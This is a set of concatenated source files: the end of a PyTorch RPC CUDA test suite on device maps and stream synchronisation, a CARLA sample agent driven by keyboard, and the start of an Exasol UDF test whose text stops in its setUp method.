TensorPipeAgentCudaRpcTest._gpu_add_multi_gpu,
args=(torch.zeros(2).to(0), torch.ones(2).to(1))
)
self.assertEqual(rets[0].device, torch.device(1))
self.assertEqual(rets[1].device, torch.device(0))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(1))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
rpc.shutdown()
def _test_device_maps_return_to_gpu(self, dst):
options = self.rpc_backend_options
options.set_device_map(dst, {0: 1})
options.set_device_map(dst, {1: 2})
options.set_device_map(dst, {2: 3})
options.set_device_map(dst, {3: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_return_to_gpu,
args=(torch.zeros(2), torch.ones(2))
)
for i in range(len(rets)):
self.assertEqual(rets[i].device, torch.device((3 + i) % 4))
self.assertEqual(rets[0], (torch.zeros(2) + torch.ones(2)).to(3))
self.assertEqual(rets[1], (torch.zeros(2) - torch.ones(2)).to(0))
self.assertEqual(rets[2], (torch.zeros(2) * torch.ones(2)).to(1))
self.assertEqual(rets[3], (torch.zeros(2) / torch.ones(2)).to(2))
rpc.shutdown()
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu(self):
dst = worker_name((self.rank + 1) % self.world_size)
self._test_device_maps_return_to_gpu(dst)
@skip_if_lt_x_gpu(4)
def test_device_maps_return_to_gpu_self(self):
dst = worker_name(self.rank)
self._test_device_maps_return_to_gpu(dst)
@staticmethod
def _add_to_gpu(x, y):
return (x + y).to(0)
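# Sending a CUDA tensor without any device map configured should raise the error below,
# and the agent should remain usable for plain CPU RPCs afterwards.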
def _test_device_maps_missing_config(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = (
"TensorPipe RPC backend only supports CPU tensors by default.*"
"`set_device_map` on `TensorPipeRpcBackendOptions`"
)
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(dst, torch.add, args=(torch.zeros(2).to(0), 1))
elif mode == RPCExecMode.REMOTE:
rpc.remote(dst, torch.add, args=(torch.zeros(2).to(0), 1)).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
def _test_device_maps_missing_config_response(self, mode):
dst = worker_name((self.rank + 1) % self.world_size)
errMsg = "Response device mapping is not available"
with self.assertRaisesRegex(RuntimeError, errMsg):
if mode == RPCExecMode.SYNC:
rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
elif mode == RPCExecMode.REMOTE:
rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
).to_here()
else:
raise ValueError(f"unexpected mode {mode}")
# make sure RPC is still functioning
ret = rpc.rpc_sync(dst, torch.add, args=(torch.ones(2), 1))
self.assertEqual(ret, torch.ones(2) + 1)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config(self):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
def test_device_maps_missing_config_not_timeout(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=self.rpc_backend_options
)
timeout = rpc.get_rpc_timeout()
tik = time.time()
self._test_device_maps_missing_config(RPCExecMode.SYNC)
rpc.shutdown()
tok = time.time()
self.assertTrue(tok - tik < timeout)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_response_loop(self):
for _ in range(self.rpc_backend_options.num_worker_threads + 5):
self._test_device_maps_missing_config_response(RPCExecMode.SYNC)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote(self):
self._test_device_maps_missing_config(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(1)
@dist_init
def test_device_maps_missing_config_remote_response(self):
self._test_device_maps_missing_config_response(RPCExecMode.REMOTE)
@skip_if_lt_x_gpu(2)
def test_device_maps_remote(self):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, {1: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(
dst,
TensorPipeAgentCudaRpcTest._add_to_gpu,
args=(torch.zeros(2), 1)
)
self.assertEqual(rref.to_here().device.index, 1)
self.assertEqual(rref.to_here(), torch.ones(2).to(1))
rpc.shutdown()
@staticmethod
def _slow_add_on_user_stream(x, y):
s0 = torch.cuda.current_stream(x.device)
s1 = torch.cuda.Stream(device=x.device)
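        # s1 is a side stream: make it wait for work already queued on the current
        # stream, and record x and y on it so the caching allocator does not reuse
        # their memory while s1 is still consuming them.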
s1.wait_stream(s0)
x.record_stream(s1)
y.record_stream(s1)
with torch.cuda.stream(s1):
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
z = x + y
s0.wait_stream(s1)
z.record_stream(s0)
return z
def _test_custom_stream(self, fn, device_map):
options = self.rpc_backend_options
dst = worker_name((self.rank + 1) % self.world_size)
options.set_device_map(dst, device_map)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
fn(dst)
rpc.shutdown()
def _test_stream_sync(self, dst):
x = torch.ones(2, 2).to(0)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
self.assertEqual(ret, 2 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream(self):
self._test_custom_stream(self._test_stream_sync, {"cuda:0": "cuda:1"})
def _test_stream_multi_async(self, dst):
futs = []
for i in range(20):
x = torch.ones(2, 2).to(0) * i
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, x)
)
)
for i in range(20):
self.assertEqual(futs[i].wait(), 2 * torch.ones(2, 2).to(0) * i)
@skip_if_lt_x_gpu(2)
def test_custom_stream_multi(self):
self._test_custom_stream(
self._test_stream_multi_async,
{"cuda:0": "cuda:1"}
)
@staticmethod
def _nested_slow_add_on_user_stream(dst, x, y, z):
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._slow_add_on_user_stream,
args=(x, y)
)
return TensorPipeAgentCudaRpcTest._slow_add_on_user_stream(ret, z)
def _test_stream_nested_sync(self, dst):
x = torch.ones(2, 2).to(0)
y = torch.ones(2, 2).to(0) * 2
z = torch.ones(2, 2).to(0) * 3
nested_dst = worker_name((self.rank + 2) % self.world_size)
ret = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
self.assertEqual(ret, 6 * x)
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested(self):
self._test_custom_stream(
self._test_stream_nested_sync,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
def _test_stream_nested_multi_async(self, dst):
if self.rank == 0:
futs = []
n = 5
xs, ys, zs = [], [], []
for i in range(n):
x = torch.ones(2, 2).to(0) * (i - 1)
y = torch.ones(2, 2).to(0) * i
z = torch.ones(2, 2).to(0) * (i + 1)
xs.append(x)
ys.append(y)
zs.append(z)
nested_dst = worker_name((self.rank + 2) % self.world_size)
futs.append(
rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._nested_slow_add_on_user_stream,
args=(nested_dst, x, y, z)
)
)
for i in range(n):
self.assertEqual(futs[i].wait(), xs[i] + ys[i] + zs[i])
@skip_if_lt_x_gpu(2)
def test_custom_stream_nested_multi(self):
self._test_custom_stream(
self._test_stream_nested_multi_async,
{"cuda:0": "cuda:1", "cuda:1": "cuda:0"}
)
@staticmethod
def _gpu_add_wrong_gpus(x, y):
if x.is_cuda and y.is_cuda:
return x.cpu() + y.cuda()
else:
raise ValueError("Wrong device affinity")
@skip_if_lt_x_gpu(1)
def test_device_mismatch(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0: 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
x = torch.zeros(2).to(0)
y = torch.ones(2).to(0)
with self.assertRaisesRegex(
RuntimeError,
"Expected all tensors to be on the same device, but found at least two devices"
):
rets = rpc.rpc_sync(
dst,
TensorPipeAgentCudaRpcTest._gpu_add_wrong_gpus,
args=(x, y)
)
rpc.shutdown()
def _test_rref_synchronization(self, local_device, remote_device):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device : remote_device})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
x = torch.randn(200, 1, 28, 28).to(local_device)
actual = rref.remote().forward(x).to_here()
expected = rref.rpc_sync().forward(x)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_to_here_synchronization1(self):
self._test_rref_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization2(self):
self._test_rref_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization3(self):
self._test_rref_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_to_here_synchronization4(self):
self._test_rref_synchronization("cuda:0", "cuda:1")
def _test_rref_as_arg_synchronization(
self,
local_device,
remote_device,
devicesOptions=None
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {local_device: remote_device})
input_src = worker_name((self.rank - 1 + self.world_size) % self.world_size)
options.set_device_map(input_src, {remote_device: local_device})
if devicesOptions is not None:
options.set_devices(devicesOptions[self.rank])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 1:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_x = RRef(torch.randn(200, 1, 28, 28).to(local_device))
actual = rref.remote().forward(rref_x, True).to_here()
expected = rref.rpc_sync().forward(rref_x, True)
self.assertEqual(actual, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization1(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization2(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization3(self):
self._test_rref_as_arg_synchronization("cuda:1", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_as_arg_synchronization4(self):
self._test_rref_as_arg_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(1)
def test_rref_as_arg_synchronization5(self):
self._test_rref_as_arg_synchronization(
"cuda:0",
"cuda:0",
[["cuda:0"] for _ in range(4)], # devicesOptions
)
@staticmethod
def _rref_relay(rref):
return rref.to_here()
def _test_rref_forward_synchronization(self, local_device, remote_device):
options = self.rpc_backend_options
input_src = worker_name(0)
model_dst = worker_name(1)
out_relay = worker_name(2)
if self.rank == 0:
# for 1) model construction 2) forward execution
options.set_device_map(model_dst, {local_device: remote_device})
# Forward output will be first copied to the relay node before
# returning to the worker. This is intentional, to test RRef
# forward CUDA stream synchronizations.
options.set_device_map(out_relay, {local_device: local_device})
elif self.rank == 1:
            # worker1 hosts the model and runs forward. The forward function
            # calls RRef.to_here(), hence worker1 needs to configure the device map
options.set_device_map(input_src, {remote_device: local_device})
elif self.rank == 2:
            # worker2 will get the out RRef and call to_here() and hence needs
            # to configure the device map.
options.set_device_map(model_dst, {local_device: remote_device})
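        # Resulting topology: worker0 sends the input to worker1 (the model owner),
        # worker1 pulls the input RRef back from worker0 inside forward(), and
        # worker2 fetches the output RRef from worker1; each hop needs its own map.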
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
if self.rank == 0:
# This test compares rref.rpc_sync().forward(x) vs rref.remote().forward(x).to_here()
# If to_here() is properly synchronized with forward(x) the results must be identical
# This test needs multiple iterations and significant batch size to simulate real
            # training of a CNN on MNIST-like data.
# see https://github.com/pytorch/pytorch/issues/54771
rref = rpc.remote(model_dst, MyConvNetForMNIST, args=(remote_device,))
for _ in range(10):
rref_input = RRef(torch.randn(200, 1, 28, 28).to(local_device))
rref_out = rref.remote().forward(rref_input, True)
out = rpc.remote(
out_relay,
TensorPipeAgentCudaRpcTest._rref_relay,
args=(rref_out,)
).to_here()
expected = rref.rpc_sync().forward(rref_input, True)
self.assertEqual(out, expected)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_rref_forward_synchronization1(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization2(self):
self._test_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization3(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_rref_forward_synchronization4(self):
self._test_rref_forward_synchronization("cuda:1", "cuda:1")
def _test_owner_rref_forward_synchronization(self, local_device, remote_device):
if self.rank == 0:
options = self.rpc_backend_options
options.set_device_map("w0", {local_device: remote_device})
rpc.init_rpc(
"w0",
rank=0,
world_size=1,
rpc_backend_options=options
)
model = rpc.remote(
"w0", torch.nn.Linear, (2048, 20000)
).remote().to(remote_device)
for _ in range(30):
data = torch.rand(2048, 2048).to(local_device)
output = model.rpc_sync().forward(data)
# to_here() internally calls localValue as the caller is
# the owner of the RRef.
v0 = rpc.RRef(output).remote().sum().to_here().item()
v1 = output.sum().item()
self.assertEqual(v0, v1)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_owner_rref_forward_synchronization1(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization2(self):
self._test_owner_rref_forward_synchronization("cuda:0", "cuda:1")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization3(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:0")
@skip_if_lt_x_gpu(2)
def test_owner_rref_forward_synchronization4(self):
self._test_owner_rref_forward_synchronization("cuda:1", "cuda:1")
@staticmethod
def _return_tensor_view(i):
x = torch.ones(1000, 200).cuda(0) * i
torch.cuda._sleep(10 * FIFTY_MIL_CYCLES)
# serialization of the return value will create a new tensor from the
# view, which is done outside of the user function.
return x.split(100)[0]
@skip_if_lt_x_gpu(1)
def test_tensor_view_as_return_value(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
futs = []
for i in range(5):
futs.append(rpc.rpc_async(
dst,
TensorPipeAgentCudaRpcTest._return_tensor_view,
args=(i,)
))
for i in range(5):
self.assertEqual(torch.ones(100, 200) * i, futs[i].wait())
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected source devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {0 : 0})
options.set_devices([1])
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(2)
def test_devices_option_mismatch_reverse(self):
with self.assertRaisesRegex(
ValueError,
"Node worker0 has unexpected target devices in its device map for worker1"
):
dst = worker_name((self.rank + 1) % self.world_size)
options = rpc.TensorPipeRpcBackendOptions(
init_method=self.rpc_backend_options.init_method,
num_worker_threads=self.rpc_backend_options.num_worker_threads,
device_maps={dst: {0 : 1}},
devices=[0]
)
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_int(self):
fut = Future(devices=[0])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_str(self):
fut = Future(devices=["cuda:0"])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_as_device(self):
fut = Future(devices=[torch.device("cuda", 0)])
@skip_if_lt_x_gpu(1)
def test_cuda_future_device_not_cuda(self):
with self.assertRaisesRegex(
ValueError, "Expected devices to have indices, got cpu"
):
fut = Future(devices=["cpu"])
def _test_cuda_future_extraction(self, wrapper, unwrapper, sparse_tensor):
# We check proper CUDA stream synchronization by adding to the tensor
# in one stream to get the expected value, and reading it from another stream.
future = Future(devices=["cuda:0"])
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
another_stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
if sparse_tensor:
tensor = build_sparse_tensor().to("cuda:0")
add_tensor = build_sparse_tensor().to("cuda:0")
expected_tensor = (tensor + add_tensor).coalesce()
else:
tensor = torch.zeros((100,), device="cuda:0")
add_tensor = torch.ones((100,), device="cuda:0")
expected_tensor = tensor + add_tensor
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor += add_tensor
if sparse_tensor:
tensor = tensor.coalesce()
future.set_result(wrapper(tensor))
with torch.cuda.stream(another_stream):
tensor = unwrapper(future.wait())
if sparse_tensor:
self.assertTrue(torch.eq(tensor.indices(), expected_tensor.indices()).all().item())
self.assertTrue(torch.eq(tensor.values(), expected_tensor.values()).all().item())
self.assertEqual(tensor.size(), expected_tensor.size())
else:
self.assertTrue(torch.eq(tensor, expected_tensor).all().item())
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=False
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: t, unwrapper=lambda v: v, sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_list_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: [t], unwrapper=lambda v: v[0], sparse_tensor=True
)
@skip_if_lt_x_gpu(1)
def test_cuda_future_can_extract_custom_class_with_cuda_sparse_tensor(self):
self._test_cuda_future_extraction(
wrapper=lambda t: TensorWrapper(t), unwrapper=lambda v: v.tensor, sparse_tensor=True
)
@skip_if_lt_x_gpu(2)
def test_cuda_future_callback_changes_devices(self):
# We check proper CUDA stream synchronization by filling the tensor with
# the expected value in one stream, and reading it from another stream.
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:0", "cuda:1"])
def cb(fut):
t0 = fut.value()
tensor1.copy_(t0, non_blocking=True)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(2)
def test_cuda_future_value_on_bad_device(self):
tensor0 = torch.zeros((100,), device="cuda:0")
tensor1 = torch.zeros((100,), device="cuda:1")
parent_future = Future(devices=["cuda:1"])
# As a plus, we test that futures still invoke callbacks even in case of
# error, and that the child futures are successful if those callbacks
# don't access the parent future.
def cb(fut):
with torch.cuda.device("cuda:1"):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor1.fill_(1)
return tensor1
child_future = parent_future.then(cb)
with torch.cuda.device("cuda:0"):
stream = torch.cuda.Stream()
with torch.cuda.stream(stream):
torch.cuda._sleep(int(1000 * get_cycles_per_ms()))
tensor0.fill_(1)
parent_future.set_result(tensor0)
with self.assertRaisesRegex(
ValueError,
r"The result contained tensors residing on device\(s\) cuda:0 "
r"which are not among the expected device\(s\) cuda:1",
):
parent_future.wait()
with torch.cuda.device("cuda:1"):
another_stream = torch.cuda.Stream()
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(child_future.wait(), 1).all().item())
@skip_if_lt_x_gpu(1)
def test_async_execution_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
t = torch.zeros((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_sleep_and_set_to_one, args=(t,))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 1).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_async_execution_nested_with_cuda_future(self):
dst = worker_name((self.rank + 1) % self.world_size)
nested_dst = worker_name((self.rank + 2) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
a = torch.ones((100,), device="cuda:0")
b = torch.ones((100,), device="cuda:0")
c = torch.ones((100,), device="cuda:0")
fut = rpc.rpc_async(dst, async_cuda_nested_add, args=(nested_dst, a, b, c))
another_stream = torch.cuda.Stream("cuda:0")
with torch.cuda.stream(another_stream):
self.assertTrue(torch.eq(fut.wait(), 3).all().item())
rpc.shutdown()
@skip_if_lt_x_gpu(1)
def test_cuda_future_modify_tensor_inplace(self):
tensor = torch.zeros((100,), device="cuda:0")
future = Future(devices=["cuda:0"])
future.set_result(tensor)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
tensor.fill_(1)
future.wait()
@skip_if_lt_x_gpu(1)
def test_cuda_future_replace_tensor(self):
tensor_list = [torch.zeros((100,), device="cuda:0")]
future = Future(devices=["cuda:0"])
future.set_result(tensor_list)
# It's weird to modify the value of a future once it's complete, but
# technically possible. Currently this is considered undefined behavior
# (in practice the future will ignore the modification and still
# synchronize with the original value). We could one day add logic to
# detect and warn or throw in such cases, but for now we just check that
# this doesn't crash.
# We set things up so that the original tensor contained in the list
# gets deleted once we replace it with the other one. This will
# invalidate any cached information held by the future.
tensor_list[0] = torch.ones((100,), device="cuda:0")
future.wait()
@skip_if_lt_x_gpu(1)
def test_rref_with_unpickleable_attributes(self):
dst = worker_name((self.rank + 1) % self.world_size)
options = self.rpc_backend_options
options.set_device_map(dst, {"cuda:0": "cuda:0"})
rpc.init_rpc(
name=worker_name(self.rank),
backend=self.rpc_backend,
rank=self.rank,
world_size=self.world_size,
rpc_backend_options=options,
)
rref = rpc.remote(dst, TensorWrapper, args=(torch.zeros(42, device="cuda:0"),))
rref.rpc_sync().increase(1)
ret = rref.rpc_sync().sum()
self.assertEqual(ret, 42)
rpc.shutdown()
|
track_4_sample_agent.py
|
#!/usr/bin/env python
# This work is licensed under the terms of the MIT license.
# For a copy, see <https://opensource.org/licenses/MIT>.
"""
This module provides an example for a Track4 agent to control the ego vehicle via keyboard
"""
from threading import Thread
import math
import sys
import time
try:
import pygame
except ImportError:
raise RuntimeError('cannot import pygame, make sure pygame package is installed')
import carla
from srunner.challenge.autoagents.autonomous_agent import AutonomousAgent, Track
from srunner.challenge.autoagents.human_agent import KeyboardControl
if sys.version_info >= (3, 3):
import shutil
def print_over_same_line(text):
"""
Refresh text line
"""
terminal_width = shutil.get_terminal_size((80, 20)).columns
empty_space = max(0, terminal_width - len(text))
sys.stdout.write('\r' + text + empty_space * ' ')
sys.stdout.flush()
else:
# Workaround for older Python versions.
def print_over_same_line(text):
"""
Refresh text line
"""
line_length = max(print_over_same_line.last_line_length, len(text))
empty_space = max(0, line_length - len(text))
sys.stdout.write('\r' + text + empty_space * ' ')
sys.stdout.flush()
print_over_same_line.last_line_length = line_length
print_over_same_line.last_line_length = 0
def distance_vehicle(waypoint, vehicle_position):
"""
Calculate distance between waypoint and vehicle position
"""
dx = waypoint[0] - vehicle_position[0]
dy = waypoint[1] - vehicle_position[1]
dz = waypoint[2] - vehicle_position[2]
return math.sqrt(dx * dx + dy * dy + dz * dz)
def get_closest_waypoint(gps_position, scene_layout):
"""
Get closest waypoint to current gps position
"""
min_dist = 10000
closest_way_id = None
for waypoint_id, waypoint_data in scene_layout.items():
current_waypoint_distance = distance_vehicle(waypoint_data['position'], gps_position)
if current_waypoint_distance < min_dist:
closest_way_id = waypoint_id
min_dist = current_waypoint_distance
return closest_way_id, min_dist
class HumanTextInterface(object):
"""
Class to control a vehicle manually for debugging purposes
"""
def __init__(self, parent):
self.quit = False
self._parent = parent
self._width = 800
self._height = 600
self._throttle_delta = 0.05
self._steering_delta = 0.01
pygame.init()
pygame.font.init()
self._clock = pygame.time.Clock()
self._display = pygame.display.set_mode((self._width, self._height), pygame.HWSURFACE | pygame.DOUBLEBUF)
pygame.display.set_caption("Track4 Sample Agent")
def run(self):
"""
Run the GUI
"""
while not self._parent.agent_engaged:
time.sleep(0.5)
controller = KeyboardControl()
input_data = self._parent.sensor_interface.get_data()
# agent is engaged. Take the closest waypoint.
closest_waypoint, distance = get_closest_waypoint(input_data['GPS'][1],
input_data['scene_layout'][1])
        # We now navigate, updating the closest waypoint on every iteration
while not self.quit:
self._clock.tick_busy_loop(20)
controller.parse_events(self._parent.current_control, self._clock)
# Process events
pygame.event.pump() # to get all the keyboard control
# process sensor data
            input_data = self._parent.sensor_interface.get_data()
            # merge your position with the input data and inform the client:
            # recompute the closest waypoint from the fresh GPS reading
            closest_waypoint, distance = get_closest_waypoint(input_data['GPS'][1],
                                                              input_data['scene_layout'][1])
            print("Closest waypoint id is ", closest_waypoint, ' Dist ', distance)
pygame.quit()
class Track4SampleAgent(AutonomousAgent):
"""
    This is a human-controlled agent with Track 4 access, used for testing
"""
current_control = None
agent_engaged = False
def setup(self, path_to_conf_file):
"""
Setup the agent parameters
"""
self.track = Track.SCENE_LAYOUT
self.agent_engaged = False
self.current_control = carla.VehicleControl()
self.current_control.steer = 0.0
self.current_control.throttle = 1.0
self.current_control.brake = 0.0
self.current_control.hand_brake = False
self._hic = HumanTextInterface(self)
self._thread = Thread(target=self._hic.run)
self._thread.start()
def sensors(self):
"""
Define the sensor suite required by the agent
        :return: a list of sensor dictionaries in the format shown below
"""
sensors = [
{'type': 'sensor.other.gnss', 'x': 0.7, 'y': -0.4, 'z': 1.60, 'id': 'GPS'},
{'type': 'sensor.scene_layout', 'id': 'scene_layout'},
{'type': 'sensor.object_finder', 'reading_frequency': 20, 'id': 'object_finder'},
]
return sensors
def run_step(self, input_data, timestamp):
"""
Execute one step of navigation.
"""
self.agent_engaged = True
return self.current_control
def destroy(self):
"""
Cleanup
"""
self._hic.quit = True
self._thread.join()
|
modify_priority.py
|
#!/usr/opt/bs-python-2.7/bin/python
# -*- coding: utf-8 -*-
#SPOT-2234
import os
import sys
import unittest
import time
import threading
import Queue
sys.path.append(os.path.realpath(__file__ + '/../../../lib'))
import udf
from udf import requires
import exatest
class VisiblePriorityModificationTest(udf.TestCase):
# queue = Queue.Queue(0)
def setUp(self):
# create table
self.query('DROP SCHEMA IF EXISTS TEST_SCHEMA CASCADE')
self.query('CREATE SCHEMA TEST_SCHEMA')
